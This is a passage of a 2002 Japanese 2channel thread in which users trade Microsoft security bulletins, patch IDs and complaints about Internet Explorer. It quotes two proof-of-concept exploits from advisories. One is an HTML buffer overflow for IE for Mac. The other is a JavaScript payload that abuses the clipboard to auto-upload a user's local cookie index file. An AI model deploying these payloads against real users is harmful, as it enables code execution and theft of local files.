マイクロソフトセキュリティ情報（MS02-008） の修正プログラムの適用が
必要であるかどうかはどのように分かるのですか?　をご覧ください。

でそこ見たら「system32またはsystem」に直してやがんの
ここ見てんのかな？　それじゃ　一言わせてね
ヴァ〜〜〜〜〜〜〜〜〜〜〜カ
断りもなしに勝手に公式文書の中身書き換えてバックれんな！
北朝鮮に移転しろ　そのほうが社風にあってるぜ

586さん、私にも言わせて！

「世間に発表する前に、ここに相談しに来たら？」
「親切な人が多いから、皆で考えてもらえるかも」

最近のMSのパッチ責めで疲れた漏れは
iBook買った
Macはマターリしてていいぞ

NetBSD/macppc

M$は仕事できないやつが多いんだろうな。

金になることは真剣にやるけど
金にならないことは適当にやる。

文句ある？

>>591
何だか中国人みたいだな

上げ〜

やっと、カーネル・サンダースの呪いの期限が切れた。
阪神は本来、神のチーム。
これくらいのゲームができて当たり前。
1938年に開幕７連勝した時に阪神は優勝した。
今年も９割方優勝する。
阪神電鉄の株価もウナギ昇りだ。
優勝すれば経済効果も核爆弾級だろう。
現在、阪神ファンの脳内モルヒネ分泌量は最高だ。
仕事にも遊びにもハリが出る。
阪神ファンが勝ち味に飢えていたが故に。
カーネル・サンダースは俺たち阪神ファンに17年間の試練を与えた。
今はそのことに感謝したい。
昼食時には是非ともKFCを利用したいと思っている。

八方がおかしくなった

むっしゅムラムラ

「IEの最新の修正プログラムは今なお2002年2月に公開されたコードの利用に対して脆弱」
https://www.netsecurity.ne.jp/article/2/4773.html

>>594
マナーが悪い阪神ファンは日本中から
呪われてますが？

「MS02-019: Internet Explorer for Mac および Office for Mac の未チェッ
クの バッファによってコードが実行される(Q321309)」
特別なHTML エレメントの処理に含まれる脆弱性により、悪意のある ユーザーが
バッファのオーバーラン攻撃 を発生させることができます。
特定のHTML エレメントに含まれる Apple Scripts を実行する脆弱性です。こ
の問題を利用して悪意のあるユーザーがユーザーの許可なしに ローカルのプログ
ラムを実行できる可能性があります。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-019ov.asp

600

Mac版IEとOfficeにセキュリティ・ホール，深刻度は「高」
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020417/1/

もう、どうでもいいや。
そんな特殊な状況に出くわすわけでもなし。

ほんと　もうどうでもいいって感じだね

Mac版IEとOfficeにセキュリティ・ホール，深刻度は「高」
Exploit:

http://www.securiteam.com/windowsntfocus/5WP0C1P6UA.html

The following HTML file will demonstrate the problem.
We chose to use IMG simply because that is instantly loaded,
but an <A HREF=...> could have been used also.
It can also be viewed (in live form)
at http://www.w00w00.org/files/advisories/ie_sample.html.
It overwrites the saved link register that is used for
a subroutine's return address on PowerPC.
This will allow remote execution of arbitrary code.
The saved link register is overwritten by the 0x41424344.
This vulnerability will allow up to 1313 characters
before the saved link register. Pure binary data (including NUL bytes)
can be used by escaping it (i.e., A as %41).
However, using "%41" will count as three characters,
rather than just one. NOTE: By character, we mean uni-byte characters.

<html>
<body>
<img src=file:///[1313 characters]%41%42%43%44>
</body>
</html>

age

IEに新たなセキュリティーホール：「戻る」ボタンで攻撃開始？
http://headlines.yahoo.co.jp/hl?a=20020418-00000001-wir-sci

こりゃまた扇動的な見出し付けたもんだなヤフーは

バグありすぎ。。。。

>>606
どうしても「戻る」ボタンで戻らないといけない場合、
どうすればいいんでしょうか？回避法とかないんですか？

>>609
ひよこに帰れよ

最近ネスケにしたよ。
ネスケも穴あるけど、なんたってマイナーだからな。(w

ネスケって重くない？

手術ラよりは軽い

>手術ラよりは軽い

ぁ、、オペラかょ！　（しばらく考えた）

ネスケなら、4.78 でいいだろ？

普段6.0だが4.78でもいいかも。動的に再描画してくれないけどな。

>>615
http://www.vector.co.jp/soft/win95/net/se208587.html
これはどうかな？

現在作業中であった場合は情報が失われました、
て頻繁に出るんだけどなんで

>>617 セキュリティと関係ないよ。
IEが壊れてる（修復しろ）か他のアプリと干渉して不安定になっているか
だろう。
パソコン初心者＠2ch掲示板
http://pc.2ch.net/pcqa/　へ。

穴がありすぎて既にどれをふさいだのか把握できてないみょ

>>617
俺も増えたように感じる。前はほとんど（数ヶ月に一度）お目にかから
なかったのに、今は数日に一度。Q319182当ててからかな、、？
出るときは複数のIEの窓を開いていて、一つの窓を閉じた時が多い
感じがする。関係ないかもしれないけど。
もっとも618の言うようなことかもしれないけどね。

>>509
オレも、TweakUIでショートカットアイコンの矢印を薄くしてたんだけど、
最近、"Windows Update"を実行したら、普通の矢印になっちまったよ。
早く直してくれ。普通の矢印、嫌いなんで、うっとうしいんだよな。

test

＜Microsoft＞
▽ Internet Explorer/Outlook
Internet Explorer 6.0とOutlook 6.0でXBMグラフィック・ファイルの使用を
許可しているため、HTMLやメールに 含まれるIMGタグで呼び出すことが可能な
る。このとき、呼び出されたが画像のサイズがチェックされないた め、大量のメ
モリを消費させることが可能になる。
ttps://www.netsecurity.ne.jp/article/6/5022.html

SecurePoint
IE/OE6.0 cannot handle malformed XBM files
http://msgs.securepoint.com/cgi-bin/get/bugtraq0204/329.html

SNMP サービスに含まれる未チェックのバッファにより、任意のコードが
実行される (MS02-006)

このセキュリティ情報の対象となるユーザー : 簡易ネットワーク管理プロトコ
ルを使用して Microsoft(R) Windows(R) 95、98、98SE、Windows NT(R) 4.0、
Windows 2000 または Windows XP システムを管理しているシステム管理者

推奨する対応策 : Windows 2000 および Windows XP の SNMP を使用しているお
客様はこの修正プログラムを適用して下さい。そのほかのお客様は、SNMP サー
ビスを実行している場合、サービスを無効にして下さい。また、修正プログラム
が入手可能となりましたら、修正プログラムを適用して下さい。

影響を受けるソフトウェア :
・ Microsoft Windows 95
・ Microsoft Windows 98
・ Microsoft Windows 98SE
・ Microsoft Windows NT 4.0
・ Microsoft Windows NT 4.0 Server, Terminal Server Edition
・ Microsoft Windows 2000
・ Microsoft Windows XP

・ よく寄せられる質問 ： マイクロソフトセキュリティ情報（MS02-006）
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/fq02-006.asp

どのように SNMP サービスを無効にするのですか?
使用中のシステムに次の手順を行って下さい。

Windows 95、98 および 98SE :
[コントロール パネル] で [ネットワーク] をダブルクリックします。
[構成] タブで、インストールされているコンポーネントの一覧から [Microsoft SNMP エージェント] を選択します。
[削除] をクリックします。
次のキーをチェックし、snmp.exe がリストされていないことを確認して下さい。
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run


↑98SEは[構成] タブなんかないぞ( ﾟДﾟ)ｺﾞﾙｧ!!
SNMP サービスってよく分からないしシステム管理者でもないんですが、
やっぱりパッチを当てるなりサービスを無効にしたほうがいいですよね？

>>625
確かにないね。検索するとexeはあるけどね。
とりあえずヘルプ→バージョン情報でQ319182があれば
しばらく何も考えないほうがいいと思われ。

そうそう。もうこの状況に疲れたら
Operaとか、他のブラウザをインストールしておいたほうがいいよ。
つーか、IEが２ndになってしまった漏れ（w

http://www.microsoft.com/japan/technet/security/bulletin/ms02-006.asp?frame=true

98SEユーザーなんですが98用の「314147JPN8.EXE」をインストするんでしょうか？
それとも今回は待ちなんでしょうか？
はっきり言って難しい説明はいらないからこれにはこのパッチを入れろと
分かりやすく書け、ゲイツ！

＞分かりやすく

わ・か・り・や・す・く

>>627
これでいいか？

>>627のレベルを想像するに、コンパネ→ネットワークにSNMPサービスがあれば削除。
これだけすればインストールの必要なし。

ショートカットの矢印や共有アイコンの変更ができなくなった点については
直してもらえる見込みはあるのだろうか。
それともこのまま、変更できないのが「仕様」ということになってしまうのか？

ダサダサの矢印はまだいい。問題は、共有設定のあの気色悪い手のアイコンだ。
漏れはＣＤドライブを共有しているのだが、ゲームＣＤの可愛らしい美少女アイコンが
イヤラシイ男の手でおおわれて・・・うおおおお（血涙）！！！

( ﾟдﾟ)ﾎﾟｶｰﾝ

襟裳岬

『MSN Messengerに深刻なホール，すべてのIEユーザーは対策を』
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020509/1/
影響を受けるのは，MSNチャットコントロールを含むMSN MessengerやExchange
Instant Messenger。ただし，Messengerなどを使用していなくても，意識せずに
チャッ トコントロールをインストールしている場合が十分ありうるので，すべて
のInternet Explorer（IE）ユーザーが対策を施す必要がある。セキュリティ・
ホール情報と同時に 公開されたパッチ（修正プログラム）を適用すれば影響を回
避できる。

http://pc.2ch.net/test/read.cgi/sec/1020794446/21

age

某所で「IEのパッチ未リリースのセキュリティホール一覧」みたいなリストがあった。
んで、それがほとんどJavaScriptがらみ。

ちゅうか。
漏れジャバスクはMSに繋ぐ時を除き、必ず切ってるが。

IE6SP1期待AGEの会と併せて、＜ジャバスク強要サイトに「CGI使えやこら！」ってメル送る会」、作りませんか？

CGIはどこでも使えるわけじゃないからねぇ
まぁなくても大差ないようなJavaScriptは勘弁とも思ふ

>>636
仕事で使うオンラインカタログが、ジャバスク強要で。
かなり嫌。
自社鯖のくせに、みたいな。

>>635
JavaScriptとCGIの機能的な限界の差異の分からない人が、
でしゃばーた真似するな。

『MSN Messengerに深刻なホール，すべてのIEユーザーは対策を』
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020509/1/
影響を受けるのは，MSNチャットコントロールを含むMSN MessengerやExchange
Instant Messenger。ただし，Messengerなどを使用していなくても，意識せずに
チャッ トコントロールをインストールしている場合が十分ありうるので，すべて
のInternet Explorer（IE）ユーザーが対策を施す必要がある。セキュリティ・
ホール情報と同時に公開されたパッチ（修正プログラム）を適用すれば影響を回
避できる。

関係ないケドMS重いんだけど････
気のせいやったらｽﾏｿ

メッセンジャーのパッチってどれ？
新しいバージョンをインストールしたらいいの？

この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。
http://www.microsoft.com/Downloads/Release.asp?ReleaseID=38790
↓その中身がこれ
Microsoft MSN Chat (MSN チャット)
http://download.microsoft.com/download/chat/Patch/4.1/W98XP/EN-US/MSNChatSecFix.exe


アップデートされたソフトウェアのバージョンは、次のサイトからダウンロードできます。
MSN チャット コントロールのアップデートされたバージョンのダウンロード先 :
http://chat.msn.co.jp
修正されたコントロールを含む MSN Messenger のアップデートされたバージョンのダウンロード先 :
http://messenger.msn.co.jp/download/download.asp?client=1&update=1
修正されたコントロールを含む Exchange Instant Messaging サービス のアップデートされたバージョンのダウンロード先 :
http://www.microsoft.com/Exchange/downloads/2000/IMclient.asp
ダウンロード先のリストから 「Japanese」 を選択して下さい。


上のパッチを当てて、下の新しいメッセンジャーソフトを入れるのが無難かもね。

>>638
しかしMSDNくらいJavaScript使い倒しで使いやすくしてるページなら許すけど、
どーでもいいページでJavaScriptを強制されるほど腹の立つことは無い。んなページ見ないけどな。(w

>>638
特定の条件が揃うと、ブラウザクラッシャー状態になるとこなんで、とっても困ってるんですが。
不良セクタできましたし。

>>644
不良セクタは関係ない。

>>645
電源強制カットするしかなかったんですが。

ブラクラ程度ならCTRL-ALT-DELで止まらんか? ネットワークケーブル引っこ抜いても良いし。
つーか、止められないのに出会ったこと無い。

>>647
いきなりブルークラッシュだったんだけど。
何が起こったのか理解できなかった、一瞬。

メールしたら、「対応ブラウザでご利用ください」、なんてレスが来たし。

とりあえずソース欲しかったんで、MACで保存しときました。

URLプリーズ

>>649
内緒（らぶ
今度暇ができたら、ぽちぽち遊びます。

HISTORYフォルダ下のindex.datについて詳しいサイトないっすか？

なんかIEとは関係ないものまで現れるんですけど…。
（ちなみにIEは4です、すいまそん）

User-Agent に Q312461 または T312461 の文字列のない IE は
パッチを当ててないか偽装 UA のどちらかと断定してしまっていいですか？
偽装 UA のかなりの部分がロボット（それもメールアドレス収集とかの
あやしげなもの）の気配が濃厚なんで、偽装でないものも含めて
MS のページにリダイレクトするよう Web サーバを設定してやりたいんだけど。

最近出荷された PC にプレインストールされた IE はパッチ済みだけど
この文字列がない、とかいうことがあれば考えなおさなきゃならんので
教えてください。

>>652
IEにパッチを入れなればそういう文字列が出ないだけで、それはユーザが
入れてないだけのこと。
それにその2種類以外だってあるのだし。
UAの偽装を見破ることは無理。

>>653
そんなこと百も承知で疑わしい奴はMSに飛ばしちまおうというんだろ。
しかし、パッチ済みでUAにパッチIDの無い奴があったらまずいのでそれを知りたいというのが>>652
もうちっと、読解力つけろや。

>>654
だから無理だって言ってんじゃないの

つまり、出る杭は打たれて根元を曲げちゃって親方に怒られるって事だね？

関連スレッド：メーラーの視点で

OE(又はIEコンホ?ーネント使用メーラー)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021137509/

>>655
どんな場合に無理なのか具体例を教えていただきたく。
UA の偽装を100%見破ることは目的ではない。セキュ穴をふさいだのに
パッチ ID が UA にあらわれない場合があるのかどうかが知りたいだけ。

↓UA をパッチなし IE に偽装したロボットによるアクセスの実例
eng002.goo.ne.jp - - [14/May/2002:12:43:20 +0900] "GET / HTTP/1.1" 200 42633 "" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"

goo 逝ってよし。

MS02-023 出ますた。Windows Update でも可能。
http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/bulletin/ms02-023ov.asp

いいかげん何とかしてくれ↓
Q312461; Q313675; Q316059; q319182; Q321232;

>>658
単にロボット対策すればいいだけじゃないの？

>>660
robots.txt や <mata name="ROBOTS"> を解釈してくれるような
まともなロボットは UA の偽装なんてしません。

>>661
対策の仕方をそれしか知らないだけだろ。
Web制作板へどうぞ

>>658
偽装がないという前提で、まったくパッチを当てなければ表示されないが、
当てていても表示され方は様々。
パッチが出るたびに適用すればいくつも表示されるし、過去のパッチを
包括したものだけを適用すれば少ししか表示されない。
いずれかのパッチを適用していないアクセスが自分のサイトに悪影響を
及ぼすと考えてセキュ穴と言ってるのなら、該当するパッチの表示が
ないものをリダイレクトすればいい。

ちなみに私のは>>659さんと同じ5つです。

>>663
どんなにパッチを当てていても、*User-Agent* には 312461 しか出ないよ。

ダメだ、マイクロソフトが落ちてるっぽい。

http://jscript.dk/adv/TL002/
// Expected to return an array of <link> elements.
// theDocument variable used in this line is the document property of the
// argument sent to the dialog, an expected window object.
links = theDocument.all.tags("link");

// Sends the array for inspection by another function
retVal = checkLinkReadyStateComplete(links, reportLocation);

if�(objects�==�null)�
�return�retVal;
for�(i=0;�i�<�objects.length;�i++)�{
�element�=�objects(i);
�if�(element.rel.toLowerCase()�==�"stylesheet"
��||�element.rel.toLowerCase()�==�"alternate�stylesheet")
�{
��if�(element.readyState�!=�"complete"�&&�element.readyState�!=�4)�{
��reportLocation.insertAdjacentHTML("BeforeEnd",�L_StyleSheetNotInstalled_Text�+�element.href�+�"<BR><hr>");
��retVal�=�true;
��}
�}
�}

累積パッチ上げ入れようぞ

>>659
Q306121が抜けてるやん

>>668
累積パッチって、一度に複数の修正を適用するとそのうちひとつしか
表示されないんじゃないかな？ ほんとかどうかは知らんけど。
うちで最近新規インストールしたWin2k+IE5.5は、バージョン情報を見るかぎり
Q312461が入ってないけど、User-AgentにはT312461が入ってる(w

昨夜パッチあてたけど、再起動したらｱｯﾌﾟﾃﾞｰﾄに失敗しましたと表示された。
もう一度、MSに確認したら、ｲﾝｽﾄされた事になってた。

IE6　ｑ３１９１８２；　Q３２１２３２；　
↑
こんな状態です、大丈夫ですか

>>670 OSは？

>>671
言いにくいんですが、メモ帳です。
どうでしょう？

>>672
偽者ウゼー

Meです　>>671

どうやらWinME + IE6 + Q３２１２３２はパッチ当てるときに不安定のようだね。
結果的にはパッチは当たっているようだが。

>>673
本物ウゼー

Weです>>671

>>675
なに一生懸命煽ってるの？馬鹿ちゃうか〜

>>674
アドバイスありがとうです

マイクソロフト
俺もQ321232入れますた。バージョン情報見たら、ちゃんと追加されてた。
でも診断くんでみたらQ312461だった
よく分からんしまぁいいや・・・。

ちょっと冷え込んできたので、パッチをあてます。

MSのパッチを知った頃は神経質なくらい調べまくって
チェックしていたが、近頃はメールで知らせてくれたものだけ当てている。
性格がMSみたいに雑になってきた。

>>677
ｱｯ　折れもだ！！

個人情報ってなに？どんなことなの？

>>679
確かに面倒い。
ホントならIE6SP1とか出してもらって一括で修正したいんだけど
あんまり頻繁に脆弱性が見つかるもんで
MSもリリースのタイミングが取れないんだろうね。

Q321232 : セキュリティ問題の修正プログラム (Internet Explorer 6) - version 6,0,2716,2300 - のインストールに失敗しました。
16:25:49 2002年5月16日 : 5383

Q321232 : セキュリティ問題の修正プログラム (Internet Explorer 6) - version 6,0,2716,2300 - のインストールに失敗しました。
16:26:46 2002年5月16日 : 5383

Q321232 : セキュリティ問題の修正プログラム (Internet Explorer 6) - version 6,0,2716,2300 - のインストールが完了しました。
16:36:37 2002年5月16日 : 5383

>>683
俺も

>>683　

>>685

ie6のmeだけど問題なくあてれたよ。

でイケルのでは？

WinMe/IE6　です。
今まですべて当ててるはずですが
ｑ３１９１８２；　Q３２１２３２；　となってます。

ヤヴァイんでしょうか？

sageてしまいました。

>>689
私は最初からこまめにアップデートしていました。
環境はWindows Meで使用ブラウザはIE6です。

セキュリティパッチは以下のとおり。
Q306021,Q312461,Q313675,Q316059,q319182,Q321232

累積的なパッチがこの中には含まれているので、>>689さんので
万全かもしれませんが、念のために、こちらのほうでご自身でご
確認ください。

http://www.microsoft.com/japan/enable/products/security/proglist.asp?prod=032&info=13

>>691
有難う。
個別にパッチ当てていましたが、累積パッチが出たらまた上から当ててました。

了解です、確認してみます。

>>691
q313829は？

それと
またこのソフトウェアアップデートを実行すると、
修正プログラムに加えて、「制限付きサイト」のデフォルト設定を「すべてのフレームをブロックする」に制限する新しい“機能”が追加される。
ってあるんだけど、「すべてのフレームをブロックする」なんていう項目は何処にあるの？
http://www.zdnet.co.jp/news/0205/16/ne00_ie.html

EXCELの穴
http://www.zdnet.co.jp/news/0205/28/nebt_01.html
MSセキュリティスレ欲すい

>>694 立ててくれ

このスレとOEスレがあるんで、あまり乱立させても分散しちまうから、このスレの次でいいカナと。

なるほど

【Windows】セキュリティ情報総合スレッド
http://pc.2ch.net/test/read.cgi/pcnews/1014872364/

こんなんあるけど

http://pc.2ch.net/test/read.cgi/sec/1021363841/73より転載
IE 5.5/6に深刻なホール，対策はGopherプロトコルを無効にすること

フィンランドのセキュリティ・ベンダー「Oy Online Solutions」は現地時間6月
4 日，Internet Explorer（IE）5.5/6 のセキュリティ・ホールを公表した。Web
ページや HTMLメール中のリンクをクリックすると，ユーザーのパソコン上で任意
のコード（プロ グラム）を実行させられる恐れがある。対策は，IEの設定を変更
してGopherプロトコ ルを無効にすること。パッチは公開されていない。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020607/1/

>>699
この対策をして127.0.0.1から攻撃されるんですけどと騒ぐPFW厨が出現するに2000ドラクマ

>>700 ﾜﾗﾀ

オミトロンが使えなくなりましたね。

>>699 についてMSから公表あり。
MS02-027 に関する情報
「MS02-027: Gopher プロトコル ハンドラの未チェックのバッファにより、
攻撃者の任意のコードが実行される (Q323889)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-027ov.asp

MSからのメールって読んでもいつも意味が分からず
とりあえずパッチ当ててるんですが
今回はどれくらい危険なんですか？

>>704 危険度「高」だ。パッチはまだ出てない。そこで回避策を講じる必要
がある。詳細は
http://ime.nu/www.microsoft.com/japan/technet/security/bulletin/ms02-027ov.aspで。

WinsockでGopher通らないように設定変更した
MS Proxy2.0の内側にいるIE達も、
設定変更しなきゃダメ？

>>706
WinsockでGopher通さないってなんだ?
gopher://xx.xx.xx.xx:80とかポート指定されるてもブロック出来るか?

>707
MS-Proxyでは、Winsockをどのプロトコルで有効にするか
設定出来るんだよ

そのProxyもMSだからなぁ・・・

ISA Server 2000、Proxy Server 2.0用の修正プログラムのみ公開された。
Internet Explorer用のは未公開。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-027.asp
・ ISA Server 2000:
http://www.microsoft.com/downloads/release.asp?ReleaseID=39859
・ Proxy Server 2.0:
http://www.microsoft.com/downloads/release.asp?ReleaseID=39864

マイクロソフトが公開した「Gopher問題」の回避方法に誤り
　TCPポート70番のブロックでは防げない，パッチや設定変更で回避
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20020617/1/
＞誤った回避策とは，「Gopherプロトコルが使用するTCPポート70番を，
＞ファイアウオ ールなどでブロックすること」である。これでは攻撃を防げない
＞のである。
IEの設定変更で対処すべし。

英語版のセキュリティ情報は既に修正済み
http://www.microsoft.com/technet/security/bulletin/ms02-027.asp

「MS02-027: Gopher プロトコル ハンドラの未チェックのバッファにより、
攻撃者の任意のコードが実行される (Q323889)」
日本語版も訂正完了。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-027.asp
このセキュリティ情報ページを更新し、最初にリリースしたセキュリティ情報の
TCP ポート 70 番のブロックの有効性に関する情報に事実と異なる点があった
ため、削除しました。

Internet Explorer用の修正パッチは未公開。

http://www.zdnet.co.jp/news/0206/19/xert_sue.html

エラーが見つかったら自分で直せばいいじゃん

WMP 修正パッチage
http://www.microsoft.com/japan/technet/security/bulletin/ms02-032.asp

WMP6.4と7.1を入れてるんですけど（Win98環境）、
これからはwm320920_71.exeの1ヶだけ当てればWMP関係は全てOKなんですよね？

パッチが正常にインストールされたか確認する方法
- Windows Media Player 7.1
C:\Program Files\Windows Media Player (オペレーティング システムが C
ドライブにインストールされている場合) のフォルダに入っている、
wmplayer.exe のバージョンを確認します。確認するには Windows
エクスプローラーから、wmplayer.exe を右クリックし、[プロパティ] を
クリックします。 [バージョン情報] タブをクリックし、ファイルバージョン
が 7.10.0.3068 と表示されていることを確認します。

上記の方法で見るとバージョン情報を見ると　7.10.0.3068なのに、
WMP7.1のヘルプ→バージョン情報を見ると　7.01.00.3055になってる。
パッチはうまく当たったんだろうけどなぜ一致しないんだ？

技術的にはダイアログリソースとバージョンリソースは独立だから…
こういう手抜きパッチ作るなよな。

「MS02-027」のKnowleage Base公開。
http://www.microsoft.com/JAPAN/support/kb/articles/JP323/8/89.asp

IE向けパッチは遠日公開されたいという気持ちはある。

IEのセキュリティを突くようなデモをしているサイトを
教えて欲しいのですが・・・。

microsoft

Gopherは元々使わないからいいんだけども
パッチが出ないのは気持ち悪いよね。

>>720
こんなのとか？（パッチあててる人には関係ないけど）
http://homepage2.nifty.com/m_kamada/javascript/ietest7.htm

>>720
あと、こんなの。
http://java-house.jp/~takagi/security/misc/jscript-clipboard/test.html

>>724は別にセキュリティーホールを突いているわけではなかったね。
スンマソ。

>>720
http://pc.2ch.net/test/read.cgi/sec/1005185421/l50
↑のスレで紹介されてた↓のサイトの「Windows Security」のコーナーに色々あった。
http://tarikihongandou.shadowpenguin.org/

>>722
次の累積パッチに入れると見た。
次のは全部でいくつセキュリティホールをつぶすのかな。ﾜｸﾜｸ

あぼーん

ＩＥ６の修正プログラムをＴｅｃｈＮｅｔからインストールしようとして
自分の機種やＯＳ（ｗ２ｋ）以外のプログラムを誤ってインストールしてしまいました。
そのせいか残りのプログラムがエラーが出てインストールできませんでした。
もとの状態に戻すにはどうしたらいいのでしょう？
ＩＥ６アンインストールしたら全部消える？

このスレッドを知る前に他の板でも聞いてしまったけど、こんなおばかな
事例へのお答えも少なく、こちらでも質問させていただきました。
怒らないでー。教えてー。お願い致します。

>>729
モニターを縦にしてみましょう

>>717
>WMP7.1のヘルプ→バージョン情報を見ると　7.01.00.3055になってる。
同じです

>>730　してみました！（ノートだから軽くてﾖｶﾀ）
治ったかな〜？･･･だめみたいですぅ。。。

･･･お願いです。教えてください。

やったことないからシラン。

アンインストール⇒リカバリーCDROMでIE入れ直す⇒修正プログラム入れる

じゃない？

なんでまたＴｅｃｈＮｅｔなんだ？
パチ当てならアップデートで十分だろうに・・・

・IE6を上書きインストール
・修正プログラムのアンインストール
・IE6を一旦消してまた入れる
・システムの復元
・修正プログラムの/x解凍して手作業で直す
考えられる修正方法

>>735　Frethem対策ページから飛んだためです。
>>734-736　
ご指導ありがとうございます。まずIE6消してまた入れてみます。

http://archives.neohapsis.com/archives/bugtraq/2002-07/0250.html

Exploit:
-------------------------- CUT HERE -------------------------------
<!div id=h style="zoom:0.0001">
<!form name=u enctype="multipart/form-data" method=post action=upload.php>
<!input type=file name=file></form></div>
<!script>
//uploadFile="..\\LOCALS~1\\TEMPOR~1\\CONTENT.IE5\\index.dat";
uploadFile="..\\Cookies\\index.dat";
function gotKey(){
if (!event.ctrlKey) return;
document.onkeydown = null;
event.keyCode = 86;
window.clipboardData.setData("Text",uploadFile);
(p=document.forms.u.file).focus();
p.onpropertychange = function(){document.forms.u.submit()};
} document.onkeydown = gotKey;
window.onload=function(){document.body.focus()};
<!/script>
-------------------------- CUT HERE -------------------------------

Old advisories:
===============
#7 [2002-05-19] "IE dot bug"
http://online.securityfocus.com/archive/1/273168
#6 [2002-05-15] "Opera javascript protocoll vulnerability"
http://online.securityfocus.com/archive/1/272583
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561

英語版SP3が出ました。
http://download.microsoft.com/download/win2000platform/SP/SP3/NT5/EN-US/W2KSP3.exe

さっさと日本語版出せ。

>>731

wmp7.1をインストールしてある
フォルーダーの中のwmplayer.exe
を右クリックしてバージョンを見てみな。

ようやくSP3か・・・
今週中には出るかな？

IEやIEコンポ使ってるタブブラ使ってるやつはセキュリティを語る資格ないな

>>742
使って無くても、WindowsユーザーはIEと共同体だ。

>>742
どのブラウザでも然して変わらない

>>743
95以前ならIEと心中する必要はない

ケチつけたくてつけたくてたまらないからとりあえずレスしてみました
みたいなレスだな。

あ！

い？

スレッド一覧はこちらを今見たら、ノートンが反応しました。大丈夫でしょうか？

ＩＥどうしようもないね、バッファーオ−バーランする
コーディングしかできない連中がイッパイいるってことね。
マイクロアフォか、延々といたちごっこ繰り返す罠だな。
いいかげんソース公開しろ、俺が直してやるぜ。

ぐちゃぐちゃなので公開しません

>>750
だろうな、クロウトでも解析できない罠だな。
がんばって商売してくらい！！

IE6SP1は、まだなのかなぁ。

>>752
10年後に合いましょう

米Microsoft、IEのSSL実装に「なりすまし」可能な脆弱性
http://www.watch.impress.co.jp/internet/www/article/2002/0819/iessl.htm
↑これって
↓かな？
http://pc.2ch.net/test/read.cgi/sec/1016256558/16

MS02-047 に関する情報
「MS02-047: Internet Explorer 用の累積的な修正プログラム (Q323759)」
http://www.microsoft.com/japan/technet/security/bulletin/ms02-047ov.asp
この修正プログラムをインストールすることにより、
悪意のあるユーザーによる以下の攻撃を防ぐことができます。

(高) Gopher プロトコルを解釈する部分の脆弱性を悪用し
バッファのオーバーラン攻撃が行われる可能性のある問題です。
MS02-027 では、回避策のみをお伝えいたしましたが今回の
修正プログラムを適用することで対策することができます。
(高) 特別にフォーマットされたテキストを表示するために使用される
ActiveX コントロールの脆弱性を悪用しバッファのオーバーラン攻撃が
行われる可能性のある問題です。
(中) XML データを表示する HTML ディレクティブを処理する方法が
不適切であったために、ローカルファイル を読み取られる可能性のある
問題です。
(中) [ファイルのダウンロード] ダイアログ ボックス内のファイルの
ダウンロード元の場所を表示する方法に問題があり、
ユーザーに悪意のあるファイルを信頼されたサイトからのものであると
思い込ませ、ダウンロードするよう誘導される可能性があります。
(高) MS02-005 で修正した 「フレームのドメイン照合」 の脆弱性の
新たに確認された変種です。この変種により、ローカル システムの
実行可能ファイルを呼び出し悪用される可能性があります。
(しかし、実行可能プログラムにパラメータを渡すことはできないため、
パラメータを指定する必要のあるプログラムを操作する事は不可能です。)
(中) MS02-023 で最初に説明した
「ローカル HTML リソースのクロスサイト スクリプティング」 の脆弱性の
新たに報告された変種です。
クロスサイトスクリプティング (CSS) により、スクリプトを
ローカルコンピュータゾーンで実行される可能性がある問題です。

>>755 累積修正パッチ入れてみた。ウィンドウズアップデートでも更新可。
バージョン情報にQ323759が追加されていた。IE6なんだけど、更新バージョン
に7個もＱ〜が並んでる。早くSP1出してくれよー。

俺なんか８個並んでるよ・・・・。

俺のところは、この８つなんだけど
皆は、どう？

Q306121; Q312461; Q313675; Q316059;
q313829; q319182; Q321232; Q323759;

こんなん出ました。
http://w3j.org/nazokb/jp4110000.html

>>758
Windows Me,XPのひとはＭＳ02-014が対象外なのでq313829を除く７つだ。

>>758
6個だった（Windows2000 sp3, IE6）
Q312461, Q313675, Q316059, q319182, Q321232, Q323759

Q321232とQ323759の2つしかないよ

おれは7つだ。758の一番初めのやつがないよ
IEのVerは、6.026
758のバージョン教えれ

＞　Gopher プロトコルを解釈する部分の脆弱性を悪用し
＞　バッファのオーバーラン攻撃が行われる可能性のある問題

先日、２ｃｈに貼られてたリンクから、これを悪用したらしきページをふんだんだけど
どんなコードが実行されたのか不安なんで、どなたかリンク先分かりますかね。
ひよこのGIFが右から左に更新してるページでした。

SP2,Q319182,Q321232,Q323759

更新じゃないや。行進だ。ひよこの行進。　

WinMeで6.026だけど、Q321232とQ323759の二つだけ。

ＩＥ５は大丈夫なのですか？

一つしかなくても、累積パッチだから
過去の穴は全部塞がれていると思う

>>767
同じく。
最近再インストールしてWindousUpDateでいっぺんにパッチ当てたからかな？

MS02-047のパッチを当てたらMS02-046は当てなくていいんですか？

もう一回WindousUpDate行って重要な更新がなくなればいいんだよ。

今入れたら、こうなった。

Donut : RAPT #18y
OS : Windows 98 (4.10.2222) A
IE : 6.0.2600.0000 ;Q321232;q313829;Q323759;

ＩＥの最新バージョンは、
http://pc.2ch.net/test/read.cgi/sec/1021363841/118

これは？
http://www.mainichi.co.jp/news/flash/keizai/20020825k0000m020046000c.html

>>771 君がターミナル サービスを提供する Web サイトの Web マスター
ならば必要、そうでなければＭＳ02-047のみ必要。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-046.asp

>>775 なんだか不親切な記事だね。

8月24日　20:41
米マイクロソフト：
